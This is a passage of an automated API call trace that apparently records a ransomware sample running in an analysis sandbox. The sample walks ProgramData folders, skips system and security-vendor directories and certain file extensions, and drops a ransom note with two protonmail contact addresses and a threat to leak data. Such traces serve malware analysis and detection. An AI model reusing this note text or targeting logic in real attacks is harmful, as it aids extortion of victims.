nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.767] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5910d530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5910d530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.767] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0140.767] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0140.767] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0140.767] StrStrIW (lpFirst="logs", lpSrch="tmp") returned 0x0 [0140.767] StrStrIW (lpFirst="logs", lpSrch="winnt") returned 0x0 [0140.767] StrStrIW (lpFirst="logs", lpSrch="temp") returned 0x0 [0140.767] StrStrIW (lpFirst="logs", lpSrch="thumb") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="$Recycle.Bin") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="System Volume Information") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="Boot") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="Windows") returned 0x0 [0140.768] StrStrIW (lpFirst="logs", lpSrch="Trend Micro") returned 0x0 [0140.768] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0140.768] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0140.768] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0140.768] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0140.768] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0140.768] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0140.768] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcb28 [0140.768] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0140.768] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5910d530, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5910d530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5910d530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.768] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.768] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.768] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.768] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.768] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.768] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.769] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.769] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.769] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.769] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5910d530, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5910d530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5910d530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.769] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0140.769] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0140.769] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.769] Sleep (dwMilliseconds=0x32) [0140.821] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0140.821] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.821] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.821] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0140.821] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0140.821] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0140.822] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0140.822] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0140.822] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0140.822] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0140.822] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0140.822] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0140.822] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0140.822] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0140.822] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\R3ADM3.txt" (normalized: "c:\\programdata\\oracle\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0140.822] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.822] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.824] CloseHandle (hObject=0x6c4) returned 1 [0140.824] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0140.824] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0140.824] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x591a5ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x591a5ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.824] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x591a5ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x591a5ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.824] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x591a5ab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x591a5ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x591a5ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.824] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.824] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.824] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.824] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.824] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.824] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.825] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.825] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.825] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.825] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x591a5ab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x591a5ab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x591a5ab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.825] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0140.825] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0140.825] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.825] Sleep (dwMilliseconds=0x32) [0140.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0140.938] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef24e8 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.939] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0140.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef24e8 | out: hHeap=0xea0000) returned 1 [0140.939] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\R3ADM3.txt" (normalized: "c:\\programdata\\package cache\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0140.996] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.996] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.997] CloseHandle (hObject=0x210) returned 1 [0140.997] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0140.997] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0140.997] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x592b0450, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x592b0450, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.998] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x592b0450, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x592b0450, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0141.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.044] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0141.044] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0141.044] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0141.044] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="tmp") returned 0x0 [0141.044] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="winnt") returned 0x0 [0141.044] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="temp") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="thumb") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="$Recycle.Bin") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="System Volume Information") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="Boot") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="Windows") returned 0x0 [0141.045] StrStrIW (lpFirst="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpSrch="Trend Micro") returned 0x0 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.045] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.045] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.045] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2510 [0141.045] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed3a8 [0141.045] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.045] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0141.045] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0141.045] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0141.045] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="tmp") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="winnt") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="temp") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="thumb") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="$Recycle.Bin") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="System Volume Information") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="Boot") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="Windows") returned 0x0 [0141.046] StrStrIW (lpFirst="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpSrch="Trend Micro") returned 0x0 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2588 [0141.046] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed440 [0141.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.046] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x592b0450, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x592b0450, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x593489d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0141.046] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0141.046] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.047] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.047] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0141.047] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0141.047] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="tmp") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="winnt") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="temp") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="thumb") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="$Recycle.Bin") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="System Volume Information") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="Boot") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="Windows") returned 0x0 [0141.047] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="Trend Micro") returned 0x0 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2560 [0141.048] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xeda9d8 [0141.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.048] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 